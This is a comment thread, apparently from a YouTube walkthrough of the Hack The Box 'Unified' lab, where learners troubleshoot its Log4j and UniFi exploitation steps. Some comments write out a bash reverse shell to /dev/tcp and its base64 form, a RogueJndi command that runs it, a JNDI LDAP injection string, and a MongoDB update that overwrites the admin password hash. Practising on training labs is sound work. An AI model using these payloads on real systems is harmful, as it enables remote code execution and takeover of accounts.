In case anybody gets stuck towards the end like I did; the box is NOT broken, just me being a n00b 🤖 CyberGeek let me know that the reason I had problems with the admin panel UI towards the end was because the admin account has site preferences configured to use the old UI. When I created a new account, it was set to use the default (new) UI, missing some functionality and with buggy redirects. What I *should* of done, is update the password for the admin account, rather than creating a new user. So if you also run into problems at this stage, remember to update rather than insert 😉 Edit: Some people have had difficulties getting netcat to connect, Brianth identified a potential issue so hopefully this can help other people: "there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal"
I see that many people ran into the netcat listener issue, the problem seems to be not only in the echo command but everytime you use space around a pipe, I had this issue when running the command for the ldap server and removing the spaces everytime I saw a pipe seems to take away the issue
Yes i confirmed the box is working and it’s ok with the update of the admin password, i’ve stuck locked on this for 2h but it’s not a wasted it give the opportunity to discover every mongo request. For netcat there is no issue for me, i think maybe that’s because my reverse shell was capture from the log4j python script available on github. The only thing a can add is it’s possible to complete the box without upgrading the shell but thx for the script /dev/null you give. Thx for your work it’s really a good content and way to learn
Back again, to give you props on another one. Was having issues with getting the reverse shell through the exploit. Thanks for walking us through it. For sure going to be recommending your stuff man, super knowledgable.
Hi, great walkthrough, found the nudge for Burp really useful. I found out what the problem was with the UniFi settings screen not loading. as per the Sprocket security blog on the "site" section for mongo privesc requires an entry for "super" as well as "default" and then the dashboard seems to load ok.
Amazing tutorial.. I wanted to tell something to lazy people like me.. We can skip the JNDI and burp suite part.. We just have to open metasploit and search for log4j.. And the exploit will give us the shell directly... I wish I was intelligent enough to solve the machine in right way like you did😓
I got stuck on the ncat listener got everything up to that point right and I use nc -nlvp 4444 and then hit send on the repeater and it goes through the process and still nothing is showing up on the ncat terminal that I got the shell. Not really sure where it is failing
@@mr.blackbeard453 i have not yet. However, i have stepped away from trying again due to work and now holiday week. I am looking to pick back up this weekend will have more time then
@@FrankMaree There's a few potential solutions here if you didn't try already: www.reddit.com/r/hackthebox/comments/stcjm3/stuck_on_unified_tier_2_netcat_does_not_seem_to - please update here if you find the solution, it will help others 🥰
Hmm it should work 🤔 I would recommend doublechecking the steps in the article/video or official walkthrough. There's also been some other users with similar issues who suggested how they resolved in the comments, e.g. "I realized that there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal" If you still aren't getting it after that, you'll get a lot more support on the HTB forum or discord.gg/hackthebox 😉
So far everything is going great, and your video has helped me get to where I am, but currently when I run the tcpdump, I get back everything as I should except it's showing the ip in place of the hostname. How would I go about making it show the hostname like in the video? I tried Google, but you get back too wide of an array of info from all the different keywords to find the answer easily.
@CryptoCat I don't think I necessarily need the hostname in this case, but I was curious how you made it come up like that. Another issue I have is that I can't get other web pages to load while I'm running the manual proxy setup for BurpSuite, forcing me to switch back and forth between manual and auto proxy settings to do things like find and copy the commands from Sprocket or put my answers in on HTB, which really hinders my speed. I do have it set to include https per the previous challenge and I assume it should be here too. You don't appear to need to change the proxy back and forth to browse, so how can I circumvent this issue?
Either use of "-n" flag or the hostname not being active in /etc/hosts would be my guess for the first part. For your second question, I use the FoxyProxy plugin which allows you to configure multiple profiles, e.g. I use one for burp and another for SSH-D forwarding 🙂
Hi mate, it's been a while since I did these labs. I would double check the steps in the video or the official PDF walkthrough and if you can't fix it, check out the hackthebox forum/discord 🙂
Awesome video but it got me thinking: This doesn't feel like a "Starting Point" box. For someone starting out, how are they ever going to know to do any of this?
a little late but this machine is located towards the end on the very last tier of Starting Point. Up to this point you would've done at least 20 boxes and using what you've learned about enumeration, finding vulnerabilities, and privilege escalation it really isn't that complex of a machine compared to the ones you'll face outside of Starting Point.
Sounds like you are having the same problem described here: www.reddit.com/r/hackthebox/comments/stcjm3/stuck_on_unified_tier_2_netcat_does_not_seem_to, have a look through those troubleshooting steps and see if it helps. If not you can check the steps in the official PDF walkthrough or HTB forum and if worst comes to worst (you don't solve it), ask for some support in discord.gg/hackthebox 😉
Hello sir, I've been stuck for this box for 3 days, I followed the writeups but I don't know the problem. My burpsuite is not sending feedback, JNDI not sending the payload, and netcat doesn't seem to listen
Oooft, this is a tough one for starting point! Does burp and netcat normally work for you OK? I would double check the steps in the video (and the comments, as others have resolved similiar problems). If you don't get it, check in the #starting-point channel of discord.gg/hackthebox - there's lots of helpful people who'll be able assist with troubleshooting 😉
"ssx" is just an alias (shortcut) i have setup to run "searchsploit - X". You can check my full list of bash aliases here: github.com/Crypto-Cat/CTF/blob/main/my_bash_aliases.md
I have an issue with getting my terminal up with nc. Essentially I can get the HTTP server started up and the LD aP server started up to and when I send the pay load off it registers so those two servers that it’s been set off but my net cat hasn’t received anything yet is there anything I can do to fix this?
Not too sure the issue.. I would double check steps in video / official PDF walkthrough. If that fails, check the hackthebox discord and/or forum for support 😉
java -jar target/RogueJndi-1.1.jar at 11:16 in the video he edits the path and removes the portion of the command that lists a directory he is already in. Remove that part and it will run.
It's difficult for me to troubleshoot remotely, I'd recommend double-checking the steps in the video and reviewing the official PDF walkthrough (maybe one of the steps will be clearer). If you still can't get the netcat connection, jump into the HTB discord or forums for support 🙂
I tried all things step by step but i cant get netcat request back, LDAP and http running and get request back but only problem with netcat Can get acces. Please give me any solution bro🥺
@@_CryptoCat sorry sir, when I watched again your video and i understand what's the error is I just connecting to wrong port I was trying to connect to port 8080 thank for asking the problem sir
When you say it doesn't listen.. What does it say? you are doing "nc -nlvp 1337"? Can you timestamp where you are stuck, can't remember the whole box very well xD
11:53 building the reverse shell with rogue-jndi After typing that long syntax, the http and ldap server start but once I send my request again via burp suite after starting up netcat it just shows "listening on 0.0.0.0 4444"
I think the local LDAP + HTTP server is not setup correctly. When I did the TryHackMe Solar (Log4J) I got the same output you sent me in screenshot on Twitter (0 1?id) before I setup the LDAP server. Double check you've followed all of the steps: www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
@@_CryptoCat I have been stuck on this lab for hours and I am getting a similar issue. Here is what I did (as per walkthrough and link) echo 'bash -c bash -i >&/dev/tcp/10.10.10.10/4242 0>&1' | base64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDI0MiAwPiYxCg== java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDI0MiAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.10.10" ${jndi:ldap://10.10.10.10:4242/o=tomcat} Note that 10.10.10.10 is not my IP address just for the sake of this comment. It is the real one on my Kali :) I made sure I was not getting any extra space in the base64 and even tried with echo -n (in case of a hidden ). However, didn't manage to solve it. Any idea ? My netcat seems to get a communication but just showing the 0'? In the terminal :/
I am not getting a reverse shell back. I see the message in the rogue server when I execute the payload in burp . The message is ---(Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload ) but I do not get any shell in netcat listener .
Hey, have a read through some of the comments because I remember other people mentioning similar issues. You could also double check the official PDF walkthrough, just to make sure nothing was missed.
Hmmm a lot of people seem to have the problem, I don't know what to suggest if you've followed all the same steps from the video 😕 Have you had problems getting NC shells on other boxes? Any AV/Firewall blocking?
I had the same problem and how I ended up here. Double and triple check all your command syntax. Everything from the base64 encryption to the ldap server command and your port on ncat and ldap are the same. I ended up accidentally leaving brackets in and a few other things.
I had the same problem, and I realized that there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal
Please Help! Secure Connection Failed An error occurred during a connection to unified.htb:8080. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG
Yeh, using burp or curl should both work! You could also use the developer tools (f12) in chrome/firefox. Maybe there's a problem somewhere else, re-check your steps 😉
Thanks for this Crypto! Really informative. The reason why you were not able to reveal the root password though was because you created an account which was not an administrator. Had you updated the existing administrator account you would of gotten that 'site' option and been able to see the password with `db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")}, {$set: { "x_shadow" : "$6$u72...`
In case anybody gets stuck towards the end like I did; the box is NOT broken, just me being a n00b 🤖
CyberGeek let me know that the reason I had problems with the admin panel UI towards the end was because the admin account has site preferences configured to use the old UI. When I created a new account, it was set to use the default (new) UI, missing some functionality and with buggy redirects.
What I *should* of done, is update the password for the admin account, rather than creating a new user. So if you also run into problems at this stage, remember to update rather than insert 😉
Edit: Some people have had difficulties getting netcat to connect, Brianth identified a potential issue so hopefully this can help other people:
"there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal"
I thought it was pretty neat to try it both ways, so it was a good learning expirience! Thanks again!
Sounds like just another buggy-ass box from HTB
@@dumpydumpdump8869 😂
I see that many people ran into the netcat listener issue, the problem seems to be not only in the echo command but everytime you use space around a pipe, I had this issue when running the command for the ldap server and removing the spaces everytime I saw a pipe seems to take away the issue
Yes i confirmed the box is working and it’s ok with the update of the admin password, i’ve stuck locked on this for 2h but it’s not a wasted it give the opportunity to discover every mongo request. For netcat there is no issue for me, i think maybe that’s because my reverse shell was capture from the log4j python script available on github. The only thing a can add is it’s possible to complete the box without upgrading the shell but thx for the script /dev/null you give.
Thx for your work it’s really a good content and way to learn
Back again, to give you props on another one. Was having issues with getting the reverse shell through the exploit. Thanks for walking us through it.
For sure going to be recommending your stuff man, super knowledgable.
Thank you! 🥰
As a junior cybersec guy thanks for your efforts,I learn a lot
That's the goal! 🔥
i dont know how you do it but you manage to calm me down while I'm getting frustrated with a box. Thank you so much for these
Awww great to hear! Thanks mate 💜
Thank you, this means so much to us, learners, I really struggled with this Box, Thanks a lot really appreciate your work
Awww thank you! Really appreciate the kind words 🥰
This was such a great box but honestly could of not done it without your help. Thanks for the awesome walkthrough.
These starting point boxes are definitely getting harder! Thanks mate 🥰
bruh added the data in the database, and he missed up with add users in db question lmao that was funny, thank you so much
Hi, great walkthrough, found the nudge for Burp really useful. I found out what the problem was with the UniFi settings screen not loading. as per the Sprocket security blog on the "site" section for mongo privesc requires an entry for "super" as well as "default" and then the dashboard seems to load ok.
Awesome content🤘🏼🤘🏼
🥰🥰🥰
Namaste sir !
Love your work !
Thanks mate 🥰
thanks man, you are awesome!
🙏🥰
Amazing tutorial.. I wanted to tell something to lazy people like me.. We can skip the JNDI and burp suite part.. We just have to open metasploit and search for log4j.. And the exploit will give us the shell directly... I wish I was intelligent enough to solve the machine in right way like you did😓
ty and nice tip, metasploit is amazing tool! 🙂
you can explain for resolution with metasploit lol
I got stuck on the ncat listener got everything up to that point right and I use nc -nlvp 4444 and then hit send on the repeater and it goes through the process and still nothing is showing up on the ncat terminal that I got the shell. Not really sure where it is failing
Double check the PDF walkthrough as well, I think it uses a slightly different approach to me and is probably more verbose.
do you have the solution im stuck like you as well
@@mr.blackbeard453 i have not yet. However, i have stepped away from trying again due to work and now holiday week. I am looking to pick back up this weekend will have more time then
@@FrankMaree There's a few potential solutions here if you didn't try already: www.reddit.com/r/hackthebox/comments/stcjm3/stuck_on_unified_tier_2_netcat_does_not_seem_to - please update here if you find the solution, it will help others 🥰
@@FrankMaree okay brother, fortunetly i already done it, i tried again the same method and revershell open, i think it because bad connection maybe
great video
tyty 💜
Tysm as always
🙏🥰
I do the same thing step by step, but while reverse shell on netcat should occur , there is nothing, its still just listening on port :/
Hmm it should work 🤔 I would recommend doublechecking the steps in the article/video or official walkthrough. There's also been some other users with similar issues who suggested how they resolved in the comments, e.g.
"I realized that there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal"
If you still aren't getting it after that, you'll get a lot more support on the HTB forum or discord.gg/hackthebox 😉
So far everything is going great, and your video has helped me get to where I am, but currently when I run the tcpdump, I get back everything as I should except it's showing the ip in place of the hostname. How would I go about making it show the hostname like in the video? I tried Google, but you get back too wide of an array of info from all the different keywords to find the answer easily.
Hmmm do you need the hostname? Make sure you aren't running tcpdump with the "-n" flag and that the hostname is in your /etc/hosts file.
@CryptoCat I don't think I necessarily need the hostname in this case, but I was curious how you made it come up like that. Another issue I have is that I can't get other web pages to load while I'm running the manual proxy setup for BurpSuite, forcing me to switch back and forth between manual and auto proxy settings to do things like find and copy the commands from Sprocket or put my answers in on HTB, which really hinders my speed. I do have it set to include https per the previous challenge and I assume it should be here too. You don't appear to need to change the proxy back and forth to browse, so how can I circumvent this issue?
Either use of "-n" flag or the hostname not being active in /etc/hosts would be my guess for the first part. For your second question, I use the FoxyProxy plugin which allows you to configure multiple profiles, e.g. I use one for burp and another for SSH-D forwarding 🙂
Am having trouble receiving a connection on my netcat listener on Unified on HTB? What might be the problem and the solution?
Hi mate, it's been a while since I did these labs. I would double check the steps in the video or the official PDF walkthrough and if you can't fix it, check out the hackthebox forum/discord 🙂
Awesome video but it got me thinking: This doesn't feel like a "Starting Point" box. For someone starting out, how are they ever going to know to do any of this?
I feel you! This one was tough, good practice for the OSCP "Try Harder" mindset though 😁
a little late but this machine is located towards the end on the very last tier of Starting Point. Up to this point you would've done at least 20 boxes and using what you've learned about enumeration, finding vulnerabilities, and privilege escalation it really isn't that complex of a machine compared to the ones you'll face outside of Starting Point.
dont put spaces inside curly{base64,-d}|{bash,-i}
im getting back the connection with the nc but im not able to write anything, example: i write whoami and doesnt turn back anything any ideas?
Sounds like you are having the same problem described here: www.reddit.com/r/hackthebox/comments/stcjm3/stuck_on_unified_tier_2_netcat_does_not_seem_to, have a look through those troubleshooting steps and see if it helps. If not you can check the steps in the official PDF walkthrough or HTB forum and if worst comes to worst (you don't solve it), ask for some support in discord.gg/hackthebox 😉
Hello sir, I've been stuck for this box for 3 days, I followed the writeups but I don't know the problem. My burpsuite is not sending feedback, JNDI not sending the payload, and netcat doesn't seem to listen
Oooft, this is a tough one for starting point! Does burp and netcat normally work for you OK? I would double check the steps in the video (and the comments, as others have resolved similiar problems). If you don't get it, check in the #starting-point channel of discord.gg/hackthebox - there's lots of helpful people who'll be able assist with troubleshooting 😉
@@_CryptoCat Yes, normally nc and burp work fine but somehow they wont work on this box XD. Thank you sir
How do install ssx??? by default ssx is not install and I can’t find this package or tool
"ssx" is just an alias (shortcut) i have setup to run "searchsploit - X". You can check my full list of bash aliases here: github.com/Crypto-Cat/CTF/blob/main/my_bash_aliases.md
@@_CryptoCat thank you
I have an issue with getting my terminal up with nc. Essentially I can get the HTTP server started up and the LD aP server started up to and when I send the pay load off it registers so those two servers that it’s been set off but my net cat hasn’t received anything yet is there anything I can do to fix this?
Not too sure the issue.. I would double check steps in video / official PDF walkthrough. If that fails, check the hackthebox discord and/or forum for support 😉
I found it that a script on msf seems to be available, but it got stuck on "Server stopped", and I didn't know how to move on lol
Oh cool, I didn't see the MSF exploit. Try manually like the video or official walkthrough if that's not working 😉
It says that it cannot access the jar file when i tried to create the server
java -jar target/RogueJndi-1.1.jar at 11:16 in the video he edits the path and removes the portion of the command that lists a directory he is already in. Remove that part and it will run.
i do exactly what you do but the nc doesnt get anything
It's difficult for me to troubleshoot remotely, I'd recommend double-checking the steps in the video and reviewing the official PDF walkthrough (maybe one of the steps will be clearer). If you still can't get the netcat connection, jump into the HTB discord or forums for support 🙂
I tried all things step by step but i cant get netcat request back, LDAP and http running and get request back but only problem with netcat
Can get acces.
Please give me any solution bro🥺
No need bro problem solve
Problem with 389 and 1389 capturing 😂😂
Mistakes in pdf
There is new machine name three on stating point please help
ua-cam.com/video/sV9M4LKKT9s/v-deo.html 😉
Hello, sir I am getting a error while accessing website the error is "ssl_error_rx_record_too_long" the error in firefox or what
Hi mate, which part is this, the port 8443? Using "https" in URL?
@@_CryptoCat sorry sir, when I watched again your video and i understand what's the error is I just connecting to wrong port I was trying to connect to port 8080
thank for asking the problem sir
@@hva8055 No problem! 😊
Netcat doesn't seem to listen no matter how often I check my syntax, please help
When you say it doesn't listen.. What does it say? you are doing "nc -nlvp 1337"? Can you timestamp where you are stuck, can't remember the whole box very well xD
11:53 building the reverse shell with rogue-jndi
After typing that long syntax, the http and ldap server start but once I send my request again via burp suite after starting up netcat it just shows "listening on 0.0.0.0 4444"
@@PPHY_GLND Did the Test JNDI:LDAP payload work for you @ 6:54? Double check the IPs and ports are correct.
@@_CryptoCat you are awesome honestly. I didn't test 4444 first. Thanks so much for your time and patience
@@PPHY_GLND No problem 🥰
Sir, i am not getting back connection of netcat
I think the local LDAP + HTTP server is not setup correctly. When I did the TryHackMe Solar (Log4J) I got the same output you sent me in screenshot on Twitter (0
1?id) before I setup the LDAP server. Double check you've followed all of the steps: www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
@@_CryptoCat thanks sir
@@_CryptoCat I have been stuck on this lab for hours and I am getting a similar issue.
Here is what I did (as per walkthrough and link)
echo 'bash -c bash -i >&/dev/tcp/10.10.10.10/4242 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDI0MiAwPiYxCg==
java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDI0MiAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.10.10"
${jndi:ldap://10.10.10.10:4242/o=tomcat}
Note that 10.10.10.10 is not my IP address just for the sake of this comment. It is the real one on my Kali :)
I made sure I was not getting any extra space in the base64 and even tried with echo -n (in case of a hidden
). However, didn't manage to solve it. Any idea ?
My netcat seems to get a communication but just showing the 0'? In the terminal :/
I am not getting a reverse shell back. I see the message in the rogue server when I execute the payload in burp . The message is ---(Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
) but I do not get any shell in netcat listener .
Hey, have a read through some of the comments because I remember other people mentioning similar issues. You could also double check the official PDF walkthrough, just to make sure nothing was missed.
no matter what i do i cannot get netcat to listen please help
Hmmm a lot of people seem to have the problem, I don't know what to suggest if you've followed all the same steps from the video 😕
Have you had problems getting NC shells on other boxes? Any AV/Firewall blocking?
I had the same problem and how I ended up here. Double and triple check all your command syntax. Everything from the base64 encryption to the ldap server command and your port on ncat and ldap are the same. I ended up accidentally leaving brackets in and a few other things.
I had the same problem, and I realized that there is a space when placing the echo at the end of 0>&' | base64, remove the space and you can see the terminal
@@brianthlizama8278 Thanks, I'll pin that suggestion 🙂
it so sad they made this box for beginner WTF HTB
I hear this a lot! 😆
Please Help!
Secure Connection Failed
An error occurred during a connection to unified.htb:8080. SSL received a record that exceeded the maximum permissible length.
Error code: SSL_ERROR_RX_RECORD_TOO_LONG
Should be port 8443!
video is good but your accent is too hard to understand.
Awww sorry about that!
great videa. does anyone faced a problem capturea request via Burpsuite? and @Crytocat using the command curl would work? i tried didnt work.
Yeh, using burp or curl should both work! You could also use the developer tools (f12) in chrome/firefox. Maybe there's a problem somewhere else, re-check your steps 😉
Ait cool. Thanks
Thanks for this Crypto! Really informative. The reason why you were not able to reveal the root password though was because you created an account which was not an administrator. Had you updated the existing administrator account you would of gotten that 'site' option and been able to see the password with `db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")}, {$set: { "x_shadow" : "$6$u72...`
Nice, thanks for the tip! 🥰